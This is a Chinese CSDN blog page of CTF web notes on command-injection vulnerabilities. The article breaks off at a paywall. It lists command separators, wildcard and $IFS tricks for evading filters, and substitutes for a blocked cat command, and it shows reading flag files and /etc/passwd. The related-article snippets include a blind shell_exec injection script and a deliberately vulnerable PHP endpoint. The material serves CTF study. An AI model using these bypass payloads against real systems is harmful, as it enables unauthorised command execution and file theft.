命令执行漏洞

最新推荐文章于 2023-11-23 11:05:55 发布
最新推荐文章于 2023-11-23 11:05:55 发布
阅读量1.4k 收藏 16
点赞数 4
分类专栏: CTF-Web笔记 文章标签: bash php 安全 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kracxi/article/details/121896054
版权
这篇博客详细探讨了命令执行漏洞的各种绕过方法,包括1>/dev/null 2>&1重定向绕过,空格、文件名、cat命令、特定关键字及分号的过滤,以及PHP中?>闭合代码和无回显情况下的命令注入。还讨论了wget注入、DNSLog带出数据、环境变量利用、Bash盲注技巧等,并提供了相关CTF挑战的参考资料。
摘要由CSDN通过智能技术生成

目录

目录

联合执行

; //分号
| //前一个命令执行的结果做为后一个命令的参数
|| //前面条命令执行失败,才会执行下个命令
& //两条命令都会执行,任务在后台执行
&& // 只有前面条命令成功,才会执行下个命令
%0a //换行 
%0d

1>/dev/null 2>&1绕过

代表重定向到哪里,例如:echo “123” > /home/123.txt
1 表示stdout标准输出,系统默认值是1,所以">/dev/null"等同于"1>/dev/ null"
2 表示stderr标准错误
& 表示等同于的意思,2>&1,表示2的输出重定向等同于1

无字母/bin

/???/????64%20????.???
    # /bin/base64 flag.php

/???/???/???2 ???.????
    # /usr/bin/bzip2
    # 然后url访问flag.php.bz2

bypass

空格被过滤

%09   
%0a  
<
<>
${
   IFS}
$IFS$9
{
   cat,flag.php}

文件名被过滤

?
*
''
""
\
[%00-%ff]

cat被过滤

od
awk '/flag/' flag.php
nl
    nl
    ${
   PATH:${
   #TERM}:${
   SHLVL:~A}}${
   PATH:${
   #RANDOM}:${
   #SHLVL:~A}}
    ${
   PATH:~A}${
   PATH:${
   #RANDOM}:${
   #SHLVL:~A}}

/bin/cat
    ${
   HOME:${
   #}:${
   ##}}???${
   HOME:${
   #}:${
   ##}}??${
   HOME:${
   #HOSTNAME}:${
   #SHLVL}}

xxd
less
ca\t
ca''t
more
rev
    /bin/rev

fmt
base64
    /bin/base64
    code=${
   HOME:${
   #}:${
   ##}}???${
   HOME:${
   #}:${
   ##}}?????${
   #RANDOM}

tac
| cat的倒序
tail
php /flag
sh /flag      
| 利用报错出flag
paste /flag /etc/passwd    
| 可以两个一起读
diff /flag.txt  /etc/passwd
curl fi
最低0.47元/天 解锁文章
Kradress
关注
专栏目录
浅析JDWP远程命令执行漏洞 [ Mi1k7ea ]1
08-03
2022/3/2 下午8:30浅析JDWP远程命令漏洞 [ Mi1k7ea ]https://www.mi1k7ea.com/2021/08/06/浅析JDW
CmsEasy language_admin.php 后台命令执行漏洞.md
最新发布
04-08
在CmsEasy的后台管理文件language_admin.php中,存在一个命令执行漏洞,这源于该文件对特定文件进行写入操作的处理不当。具体来说,攻击者可以通过构造特殊的HTTP请求,绕过安全检查并执行系统命令。这样的漏洞可能...
命令执行盲注
灰太的表格的博客
06-11 775
命令执行盲注 想练练写脚本,就自己搭了个环境。是关于命令执行shell_exec盲注的。环境代码写的也是简陋版的。flag在文件flag里 这是1.php的内容: 打开页面是这样的: 然后自己花了十多分钟写的脚本: import requests import time import string str=string.ascii_letters+string.digits str=str+"{}_-`~!@#$%^&*()+" result="" for i in range(1,30):
shell_exec命令执行盲注
小龙在线
09-13 674
首先搭建一下服务端: flag index.php flag flag{abc123} index.php <?php shell_exec($_GET['imagin']);?> exp.py import requests import time import string str=string.ascii_letters+string.digits str=str+"{}_-`~!@#$%^&*()+" result="" for i in range(1,30):
bWAPP OS Command Injection(Blind) / PHP Code Injection 系统命令执行
angry_program的博客
02-27 1239
前言 命令执行注入漏洞(Command Injection), 是程序能够调用函数, 将字符串转化为可执行代码, 且没有考虑到攻击者可以利用字符串, 造成代码执行漏洞。很难通过黑盒查找漏洞,大部分都是根据源代码判断代码执行漏洞。 具体见之前的blog:漏洞执行漏洞 分析 如果lookup之后没有输出, 是由于缺少nslookup命令, 到服务器上安装即可: s...
php ping 命令注入,bWAPP OS Command Injection(Blind) 系统命令执行注入/盲注
weixin_39586235的博客
04-02 469
前言命令执行注入漏洞(Command Injection), 是程序能够调用函数, 将字符串转化为可执行代码, 且没有考虑到攻击者可以利用字符串, 造成代码执行漏洞。很难通过黑盒查找漏洞,大部分都是根据源代码判断代码执行漏洞。具体见之前的blog:分析如果lookup之后没有输出, 是由于缺少nslookup命令, 到服务器上安装即可:sudo apt-get install dnsutils...
没有#!的bash脚本的执行
Netfilter
07-07 5011
<br />有些bash脚本写的不规范,没有在文件开头写#!,但是却能直接执行,可是如果看内核代码,shell脚本的加载函数中的开头就会判断,如果没有#!的话就会返回错误:<br /> static int load_script(struct linux_binprm *bprm,struct pt_regs *regs)<br /> {<br /> ...<br />     if ((bprm->buf[0] != '#') || (bprm->buf[1] != '!') || (bprm-
shiro远程命令执行漏洞检测工具.zip
11-15
shiro远程命令执行漏洞检测工具:包括了shiro_attack_2.2和ShiroExploit.V2.51,大家可根据需要自行下载
CVE-2020-24581 D-Link DSL-2888A 远程命令执行漏洞分析1
08-03
**文章标题:**深入解析CVE-2020-24581:D-Link DSL-2888A远程命令执行漏洞 **文章正文:** D-Link DSL-2888A是一款由D-Link公司制造的统一服务路由器,它在AU_2.31_V1.1.47ae55之前的版本中存在一个严重的安全...
bashfuck】bashshell实现无字母命令执行的构造原理
柒月的博客
03-13 921
整个项目的核心是 Linux终端可以通过$'\xxx'的方式执行命令,xxx是字符ascii码的八进制形式,通过这一点,我们可以通过位运算符号和Linux终端的其他特性,在没有数字的情况下继续构造这样的形式以实现无字母数字仅用几个字符就实现任意命令执行
(sqlmap)【sqli-labs8-10】盲注:布尔盲注、时间盲注
07-06 3660
【sqlmap-跑盲注靶场】
命令注入小结
xnightmare的博客
03-22 439
概念 在Web应用中,有时候会将用户输入作为命令执行函数的参数(或参数的一部分),如PHP中system、exec、shell_exec等,如果对用户输入未加过滤或过滤不充分,就可能导致攻击者提交恶意构造的参数破坏命令结构,从而达到执行恶意命令的目的。 实例: 前端Web页面: 用户在输入框中输入114.114.114.114,点击Submit按钮,等待几秒,网页就会显示ping目标地址的结果。 后端PHP(Windows10环境): $target是用户输入的IP地址。如果用户输入114.114.11
Linux&bash闯关CTF
hl1293348082的专栏
04-12 486
关卡说明 每一关的目标是获取下一关的入口密码,有了这个密码才能进行下一关。 第一关 描述 下一关的密码保存在当前目录下的readme中。 命令 第二关 描述 下一关密码保存在系统中文件名中包含'-'的文件。 命令 第三关 描述 下一关密码保存在当前目录下的隐藏文件中 命令 第四关 描述 下一关密码保存在当前目录的一个text文件中 命令 第五关 描述 下一关的密码保存在符合几个条件的文件中,条件包含:文件大小为1033字节、不可执行、可读文件。 命令
命令注入实操与总结
qq_51582652的博客
03-24 2771
这个内容是为了了解命令注入攻击的过程,掌握思路。记一次DVWA靶场的通关,commix-testbed靶场的实验。
Linux玄妙之 /dev/null
u011029104的专栏
11-23 103
我们在和 Linux 接触当中,经常会见到 /dev/null。那它究竟是什么呢?我们今天就来了解一下Linux中的 /dev/null。/dev/null 在Linux中其实是一个空设备文件。它天生就自命不凡,与普通文件划清界限。其它文件遇到写入的内容照单全收,而 /dev/null 对于写入的东西通通扔掉。如果你使用 cat 去读取这个文件,那么它只会返回文件终点(EOL: end of file)。
2>/dev/null和>/dev/null 2>&1和2>&1>/dev/null
热门推荐
好学若饥,谦卑若愚
11-23 8万+
Linux中的标准输入输出 标准输入0    从键盘获得输入 /proc/self/fd/0  标准输出1    输出到屏幕(即控制台) /proc/self/fd/1  错误输出2    输出到屏幕(即控制台) /proc/self/fd/2  /dev/null代表linux的空设备文件,所有往这个文件里面写入的内容都会丢失,俗称“黑洞”  1、2>/dev/nu
bugku login2(skctf) shell盲注
zazazrt的博客
02-18 3438
首先说下是看了这篇文章以后根据大佬的wp写的脚本。脚本也是别的地方抄的改的 https://www.cnblogs.com/blili/p/9045280.html 如何绕过上面这篇写的很详细了可以参考上面这篇绕开登录,笔者做了测试盲注了数据库skctf发现作者很gou项里面没有数据 下面附上盲注的脚本: import requests url = 'http://123.206.31....
>/dev/null 2>&1 解决烦人的标准输入
Vange的专栏
03-28 3520
为什么要用 /dev/null 2>&1 这样的写法.这条命令的意思是将标准输出和错误输出全部重定向到/dev/null中,也就是将产生的所有信息丢弃.下面我就为大家来说一下, command > file 2>file   与command > file 2>&1 有什么不同的地方.       首先~command > file 2>file 的意思是将命令所产
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值